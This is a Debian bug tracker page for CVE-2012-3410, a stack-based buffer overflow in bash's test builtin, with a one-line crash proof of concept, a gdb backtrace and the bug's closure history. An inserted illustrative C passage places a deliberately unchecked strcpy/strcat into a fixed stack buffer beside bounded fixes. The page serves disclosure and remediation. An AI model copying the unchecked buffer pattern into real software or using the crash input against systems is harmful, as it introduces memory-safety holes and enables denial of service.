bash: CVE-2012-3410: Stack-based buffer overflow

Related Vulnerabilities: CVE-2012-3410  

Debian Bug report logs - #681278

Package: bash; Maintainer for bash is Matthias Klose <doko@debian.org>; Source for bash is src:bash.

Reported by: Henri Salo <henri@nerv.fi>

Date: Wed, 11 Jul 2012 21:30:17 UTC

Severity: important

Tags: confirmed, fixed-upstream, patch, security

Found in version bash/4.1-3

Fixed in version bash/4.2+dfsg-0.1

Done: Henri Salo <henri@nerv.fi>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Matthias Klose <doko@debian.org>:
Bug#681278; Package bash. (Wed, 11 Jul 2012 21:30:21 GMT)


Acknowledgement sent to Henri Salo <henri@nerv.fi>:
New Bug report received and forwarded. Copy sent to Matthias Klose <doko@debian.org>. (Wed, 11 Jul 2012 21:30:21 GMT)


Message #5 received at submit@bugs.debian.org:

From: Henri Salo <henri@nerv.fi>
To: submit@bugs.debian.org
Subject: Overflow in bash
Date: Thu, 12 Jul 2012 00:29:40 +0300
Package: bash
Version: 4.1-3
Severity: important
Tags: security, fixed-upstream, patch, confirmed

Patch: ftp://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-033
PoC: test -e /dev/fd/111111111111111111111111111111111
Advisory: http://www.openwall.com/lists/oss-security/2012/07/11/11

fgeek@kludge:~$ cat foo.sh
#!/bin/bash -x

test -e /dev/fd/111111111111111111111111111111111

fgeek@kludge:~$ gdb bash
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /bin/bash...(no debugging symbols found)...done.
(gdb) run foo.sh
Starting program: /bin/bash foo.sh

Program received signal SIGSEGV, Segmentation fault.
0x0000000000450033 in ?? ()
(gdb) bt
#0  0x0000000000450033 in ?? ()
#1  0x000000000046c8b9 in sh_xmalloc ()
#2  0x00000000004885fd in strvec_from_word_list ()
#3  0x00000000006f3448 in ?? ()
#4  0x0000000000000134 in ?? ()
#5  0x000000000047a22c in test_builtin ()
#6  0x0000000000432500 in ?? ()
#7  0x0000000000436c84 in ?? ()
#8  0x0000000000433b64 in execute_command_internal ()
#9  0x00000000004347ce in execute_command ()
#10 0x00000000004216f2 in reader_loop ()
#11 0x0000000000420e00 in main ()
(gdb) quit

fgeek@kludge:~$ bash --version
GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)

-- System Information:
Debian Release: 6.0.5
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.4.1 (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages bash depends on:
ii  base-files                6.0squeeze5    Debian base system miscellaneous f
ii  dash                      0.5.5.1-7.4    POSIX-compliant shell
ii  debianutils               3.4            Miscellaneous utilities specific t
ii  libc6                     2.11.3-3       Embedded GNU C Library: Shared lib
ii  libncurses5               5.7+20100313-5 shared libraries for terminal hand

Versions of packages bash recommends:
pn  bash-completion               <none>     (no description available)

Versions of packages bash suggests:
pn  bash-doc                      <none>     (no description available)

-- no debconf information
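
An added illustration of the bug class behind this report, not bash's source code and not part of the original report: an unchecked copy of a /dev/fd/N operand into a fixed stack buffer, next to a bounded rewrite and a strict descriptor parser. The function names and the 32-byte buffer size are assumptions made for the example.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FD_PREFIX "/dev/fd/"               /* operand prefix used in the PoC */
#define FD_PREFIX_LEN (sizeof(FD_PREFIX) - 1)
#define PBUF_SIZE 32                       /* assumed size, illustration only */

/* Unchecked pattern (caller has matched the prefix): the suffix is appended
 * to a fixed stack buffer, so a path of PBUF_SIZE bytes or more overruns it. */
void rewrite_unchecked(const char *path, char *out, size_t outsz)
{
    char pbuf[PBUF_SIZE];
    strcpy(pbuf, FD_PREFIX);
    strcat(pbuf, path + FD_PREFIX_LEN);
    snprintf(out, outsz, "%s", pbuf);
}

/* Bounded form: 0 on success, -1 if not a /dev/fd/ operand, -2 if too long. */
int rewrite_checked(const char *path, char *out, size_t outsz)
{
    if (strncmp(path, FD_PREFIX, FD_PREFIX_LEN) != 0)
        return -1;
    int n = snprintf(out, outsz, "%s%s", FD_PREFIX, path + FD_PREFIX_LEN);
    return (n < 0 || (size_t)n >= outsz) ? -2 : 0;
}

/* Stricter alternative: accept only a decimal descriptor that fits in an
 * int. Returns the descriptor, or -1 otherwise (including numeric overflow). */
int parse_dev_fd(const char *path)
{
    char *end;
    if (strncmp(path, FD_PREFIX, FD_PREFIX_LEN) != 0 ||
        path[FD_PREFIX_LEN] < '0' || path[FD_PREFIX_LEN] > '9')
        return -1;
    errno = 0;
    long v = strtol(path + FD_PREFIX_LEN, &end, 10);
    return (errno == ERANGE || *end != '\0' || v > INT_MAX) ? -1 : (int)v;
}

int main(void)
{
    const char *poc = "/dev/fd/111111111111111111111111111111111"; /* from the report */
    char out[PBUF_SIZE];
    printf("rewrite=%d fd=%d\n", rewrite_checked(poc, out, sizeof out), parse_dev_fd(poc));
    return 0;
}
```

The operand from the report is 41 bytes long, so the bounded rewrite refuses it and the parser rejects its 33-digit number as out of range.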





Changed Bug title to 'Buffer overflow in bash' from 'Overflow in bash' Request was from Henri Salo <henri@nerv.fi> to control@bugs.debian.org. (Wed, 11 Jul 2012 22:18:04 GMT)


Marked as fixed in versions bash/4.2+dfsg-0.1. Request was from Henri Salo <henri@nerv.fi> to control@bugs.debian.org. (Sun, 19 May 2013 11:21:12 GMT)


Reply sent to Henri Salo <henri@nerv.fi>:
You have taken responsibility. (Sun, 19 May 2013 11:24:05 GMT)


Notification sent to Henri Salo <henri@nerv.fi>:
Bug acknowledged by developer. (Sun, 19 May 2013 11:24:05 GMT)


Message #14 received at 681278-done@bugs.debian.org:

From: Henri Salo <henri@nerv.fi>
To: 681278-done@bugs.debian.org
Subject: fixed in
Date: Sun, 19 May 2013 14:21:12 +0300
Could not reproduce in wheezy.

Changed Bug title to 'bash: CVE-2012-3410: Stack-based buffer overflow' from 'Buffer overflow in bash' Request was from Henri Salo <henri@nerv.fi> to control@bugs.debian.org. (Sun, 19 May 2013 11:33:10 GMT)


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 17 Jun 2013 07:40:41 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 16:31:05 2019; Machine Name: buxtehude
